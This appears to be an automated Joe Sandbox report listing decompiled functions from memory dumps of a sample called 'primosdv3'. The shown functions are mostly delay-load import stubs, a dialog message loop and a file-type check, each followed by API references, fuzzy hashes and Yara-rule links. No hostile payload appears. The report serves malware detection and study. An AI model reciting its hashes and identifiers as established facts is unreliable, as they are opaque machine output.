0x00c7e5c5
0x00c7e5ed
0x00c7e5c7
0x00c7e5c7
0x00c7e5d1
0x00c7e5d2
0x00c7e5da
0x00c7e5e3
0x00c7e5e3
0x00c7e831
0x00c7e838
0x00c7e852
0x00c7e85c
0x00c7e83a
0x00c7e848
0x00c7e851
0x00c7e851
0x00c7e838

APIs

DloadProtectSection.DELAYIMP ref: 00C7E5E3

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: DloadProtectSection
String ID:
API String ID: 2203082970-0
Opcode ID: 79d5998d5bf293cd115d7d720f7f6c2ecabadb3a55b5a9eb8ba76ac841d7a777
Instruction ID: 1227d125311b32bd8c0a0dfc4e38425c0742c57f4786d9836e6920a8e90c6cda
Opcode Fuzzy Hash: 79d5998d5bf293cd115d7d720f7f6c2ecabadb3a55b5a9eb8ba76ac841d7a777
Instruction Fuzzy Hash: 83D022B20C02808BC302EBAAD8C6F0C3358BB2E700FA880C1F50CC9092CB608080D702

Uniqueness

Uniqueness Score: -1.00%

Function 00C7DD6D Relevance: 1.5, APIs: 1, Instructions: 13
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00C7DD6D(intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				void* _t7;

				SendDlgItemMessageW( *0xca8458, 0x6a, 0x402, E00C70264(_a20, _a24, _a28, _a32), 0); // executed
				_t7 = E00C7B568(); // executed
				return _t7;
			}

0x00c7dd92
0x00c7dd98
0x00c7dd9d

APIs

SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,00C71B3E), ref: 00C7DD92

Part of subcall function 00C7B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00C7B579
Part of subcall function 00C7B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00C7B58A
Part of subcall function 00C7B568: IsDialogMessageW.USER32(000302C4,?), ref: 00C7B59E
Part of subcall function 00C7B568: TranslateMessage.USER32(?), ref: 00C7B5AC
Part of subcall function 00C7B568: DispatchMessageW.USER32(?), ref: 00C7B5B6

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: Message$DialogDispatchItemPeekSendTranslate
String ID:
API String ID: 897784432-0
Opcode ID: 8b1385b8d2be17464b0f1fc126ab756d51d26706fc4e1ac85d7b74eed5069aea
Instruction ID: 96be3fa730d492929ccc00edd92091594faf5cda06a15db5d663849b86e7f2ef
Opcode Fuzzy Hash: 8b1385b8d2be17464b0f1fc126ab756d51d26706fc4e1ac85d7b74eed5069aea
Instruction Fuzzy Hash: 61D09E32144300BAD6012B51DD06F0E7AB2AB88B08F008554B288740F286729D31EB11

Uniqueness

Uniqueness Score: -1.00%

Function 00C698BC Relevance: 1.5, APIs: 1, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00C698BC(void* __ecx) {
				long _t3;

				if( *(__ecx + 8) != 0xffffffff) {
					_t3 = GetFileType( *(__ecx + 8)); // executed
					if(_t3 == 2 || _t3 == 3) {
						return 1;
					} else {
						goto L1;
					}
				} else {
					L1:
					return 0;
				}
			}

0x00c698c0
0x00c698c8
0x00c698d1
0x00c698da
0x00000000
0x00000000
0x00000000
0x00c698c2
0x00c698c2
0x00c698c4
0x00c698c4

APIs

GetFileType.KERNELBASE(000000FF,00C697BE), ref: 00C698C8

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: 676c9c29906d73c017be3d08bf3fff09ab0324909dbac0e9e13f4dc42cf7490f
Instruction ID: b8f4bda709f51fee3be1b76b8b1e20ff1a149bfed2e95804fd18a7ea0ea21ee2
Opcode Fuzzy Hash: 676c9c29906d73c017be3d08bf3fff09ab0324909dbac0e9e13f4dc42cf7490f
Instruction Fuzzy Hash: BAC01238400205C68E308B2498C80997326EA573A6BB4A694C038CA0E1C332CE8BEA00

Uniqueness

Uniqueness Score: -1.00%

Function 00C7E1D1 Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00C7E1D1() {

				E00C7E85D(0xc9c5ec, 0xcc316c); // executed
				goto __eax;
			}

0x00c7e1e3
0x00c7e1ea

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00C7E1E3

Part of subcall function 00C7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C7E8D0
Part of subcall function 00C7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C7E8E1

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: d3603b4881d6d7df9d68a53e27f7345b826012a877098aa3c65d79d9a3d2a22b
Instruction ID: 327aa3a2770120b357fbda7434c813c590048cea42d2691fa981a704fe0b0a98
Opcode Fuzzy Hash: d3603b4881d6d7df9d68a53e27f7345b826012a877098aa3c65d79d9a3d2a22b
Instruction Fuzzy Hash: 7DB012D735C140BD3A04A14A6C47D3F011CC1C9B10330C47EFC19C04C1D840EC002432

Uniqueness

Uniqueness Score: -1.00%

Function 00C7E1EC Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00C7E1EC() {

				E00C7E85D(0xc9c5ec, 0xcc3160); // executed
				goto __eax;
			}

0x00c7e1e3
0x00c7e1ea

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00C7E1E3

Part of subcall function 00C7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C7E8D0
Part of subcall function 00C7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C7E8E1

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 55559a732ca1c2ffd01c7fecc306d7a9572b85a6959d45ad8ed3f6f4228b261a
Instruction ID: 5c3f3d28730a32e6962a6ca12988debcf5e1487a3f94130612f0f78f7fcb1fe7
Opcode Fuzzy Hash: 55559a732ca1c2ffd01c7fecc306d7a9572b85a6959d45ad8ed3f6f4228b261a
Instruction Fuzzy Hash: BDB012D735C140BD3A04D14E6C47E3F011CC1C8B10330C07EF81DC10C1D840AC002532

Uniqueness

Uniqueness Score: -1.00%

Function 00C7E1F6 Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00C7E1F6() {

				E00C7E85D(0xc9c5ec, 0xcc315c); // executed
				goto __eax;
			}

0x00c7e1e3
0x00c7e1ea

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00C7E1E3

Part of subcall function 00C7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C7E8D0
Part of subcall function 00C7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C7E8E1

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 83883057458ee1057b15610b8c37cabac10449f36773c4c4b047a0d6fce468a1
Instruction ID: 44b84f0a144c57da3aa8765992262a0be92161f4eb5b626250ba56094259c6a5
Opcode Fuzzy Hash: 83883057458ee1057b15610b8c37cabac10449f36773c4c4b047a0d6fce468a1
Instruction Fuzzy Hash: C5B012D325C040BD3A04E20A6C07E3F010CC1C9B10330C07FFC1DC11C1D840AC042432

Uniqueness

Uniqueness Score: -1.00%

Function 00C7EAE7 Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00C7EAE7() {

				E00C7E85D(0xc9c6cc, 0xcc3034); // executed
				goto __eax;
			}

0x00c7eaf9
0x00c7eb00

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00C7EAF9

Part of subcall function 00C7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C7E8D0
Part of subcall function 00C7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C7E8E1

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: b8367e5c2e20f1e778e2bec9d9d8571b1bacfc4d20371075ee41ab1680e034a9
Instruction ID: 0b1117a97de47616f2fcd1f630c322b93b17dd1e14d886e2dce086ddcfaaae74
Opcode Fuzzy Hash: b8367e5c2e20f1e778e2bec9d9d8571b1bacfc4d20371075ee41ab1680e034a9
Instruction Fuzzy Hash: DFB012C72DA0827C3A0462056D86D37021CC1C4BA0330C07EF518C80C1DC804C012432

Uniqueness

Uniqueness Score: -1.00%

Function 00C7E282 Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00C7E282() {

				E00C7E85D(0xc9c5ec, 0xcc3124); // executed
				goto __eax;
			}

0x00c7e1e3
0x00c7e1ea

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00C7E1E3

Part of subcall function 00C7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C7E8D0
Part of subcall function 00C7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C7E8E1

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 5a7b4d59811d1232976ab81c097d802e7cf0b0a039f299ee85ffde4cd99a566c
Instruction ID: 2cea33501258ffae2a2af0b90864bc3c4941211d239fe3a0416089729e05a831
Opcode Fuzzy Hash: 5a7b4d59811d1232976ab81c097d802e7cf0b0a039f299ee85ffde4cd99a566c
Instruction Fuzzy Hash: 3DB012E325C040BD3A04D10B6D07E3F019CC1C8B10330C07EF81DC10C1DC416D012432

Uniqueness

Uniqueness Score: -1.00%

Function 00C7E2B4 Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00C7E2B4() {

				E00C7E85D(0xc9c5ec, 0xcc3110); // executed
				goto __eax;
			}

0x00c7e1e3
0x00c7e1ea

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00C7E1E3

Part of subcall function 00C7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C7E8D0
Part of subcall function 00C7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C7E8E1

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: ead13ee6ebde908ab2b5e45b719117f5afe45c8114e3d43bf08d07e12c8bf723
Instruction ID: c6d99a07e30f30f2692680def1fecddb20fdf2b2d0252b67893cf2beead81bb1
Opcode Fuzzy Hash: ead13ee6ebde908ab2b5e45b719117f5afe45c8114e3d43bf08d07e12c8bf723
Instruction Fuzzy Hash: 68B012D325C040BD3A04D10A6C07E7F010CC1C8B10330C47EF81DC10C1D8406C003432

Uniqueness

Uniqueness Score: -1.00%

Function 00C7E246 Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00C7E246() {

				E00C7E85D(0xc9c5ec, 0xcc313c); // executed
				goto __eax;
			}

0x00c7e1e3
0x00c7e1ea

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00C7E1E3

Part of subcall function 00C7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C7E8D0
Part of subcall function 00C7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C7E8E1

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 6afe384bcec72a292926ecdf0d9946af08c737aa42ebb1bc1c0be30d0aaf7919
Instruction ID: 47ed0f0f28e855ced8a3a676cbbe7640d91ecaf1caea40793a1f9e24f04bf9c7
Opcode Fuzzy Hash: 6afe384bcec72a292926ecdf0d9946af08c737aa42ebb1bc1c0be30d0aaf7919
Instruction Fuzzy Hash: DDB012D329D080BD3A44E10A6C07E3F010DC1C9B10330C07EFC1DC50C1D840AC002432

Uniqueness

Uniqueness Score: -1.00%

Function 00C7E250 Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00C7E250() {

				E00C7E85D(0xc9c5ec, 0xcc3138); // executed
				goto __eax;
			}

0x00c7e1e3
0x00c7e1ea

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00C7E1E3

Part of subcall function 00C7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C7E8D0
Part of subcall function 00C7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C7E8E1

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: c735d164c1f465d7cf698fba309c898c4feb29d2a88be076954a69ca41bf1c56
Instruction ID: 63b7b52de0fa39ebbdc2539dda746ddf6cdb346e70e46b6658e9833a461d3187
Opcode Fuzzy Hash: c735d164c1f465d7cf698fba309c898c4feb29d2a88be076954a69ca41bf1c56
Instruction Fuzzy Hash: B9B012E325D180BD3A84D20A6C07E3F010DC1C8B10330C17EF81DC50C1D840AC442432

Uniqueness

Uniqueness Score: -1.00%

Function 00C7E264 Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00C7E264() {

				E00C7E85D(0xc9c5ec, 0xcc3130); // executed
				goto __eax;
			}

0x00c7e1e3
0x00c7e1ea

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00C7E1E3

Part of subcall function 00C7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C7E8D0
Part of subcall function 00C7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C7E8E1

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 5a6740db03d5ad0a7d25c270379cfdbe5f29fa59cbe9ca0f8dff703233876808
Instruction ID: 01a17d1c138d0534dba63b32d693a9b5d7dc0278190b986539d1e276da500a97
Opcode Fuzzy Hash: 5a6740db03d5ad0a7d25c270379cfdbe5f29fa59cbe9ca0f8dff703233876808
Instruction Fuzzy Hash: B7B012D326D080BD3A44D10A6C07E3F014DC5C8B10330C07EF81EC50C1D8406C002432

Uniqueness

Uniqueness Score: -1.00%

Function 00C7E26E Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00C7E26E() {

				E00C7E85D(0xc9c5ec, 0xcc312c); // executed
				goto __eax;
			}

0x00c7e1e3
0x00c7e1ea

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00C7E1E3

Part of subcall function 00C7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C7E8D0
Part of subcall function 00C7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C7E8E1

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 0b6cf9cf194024729e64c43788e624eebcc7aaca04b44daa55f4e99ed31ed693
Instruction ID: 3d9c6165d9d39633c8252d2994a0a5acce3181e92e4a2808fddc8bb573b88e9b
Opcode Fuzzy Hash: 0b6cf9cf194024729e64c43788e624eebcc7aaca04b44daa55f4e99ed31ed693
Instruction Fuzzy Hash: ABB012D325C040BD3A04E11A6C07E3F015CC1C9B10330C07EFC1DC10C1D840AC002432

Uniqueness

Uniqueness Score: -1.00%

Function 00C7E200 Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00C7E200() {

				E00C7E85D(0xc9c5ec, 0xcc3158); // executed
				goto __eax;
			}

0x00c7e1e3
0x00c7e1ea

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00C7E1E3

Part of subcall function 00C7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C7E8D0
Part of subcall function 00C7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C7E8E1

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 6ca45e44bca85a6ec708b487345d8f30b6a45380a999c85f2fbbbd52eab889a5
Instruction ID: 950309f742fedd9beba4d8a6a8bab0844f55d73e106735ab565f5d27f7ad930c
Opcode Fuzzy Hash: 6ca45e44bca85a6ec708b487345d8f30b6a45380a999c85f2fbbbd52eab889a5
Instruction Fuzzy Hash: 38B012D335C180BD3A44D20A6C07E3F010CC1C8B10330C17EF81DC11C1D8406C442432

Uniqueness

Uniqueness Score: -1.00%

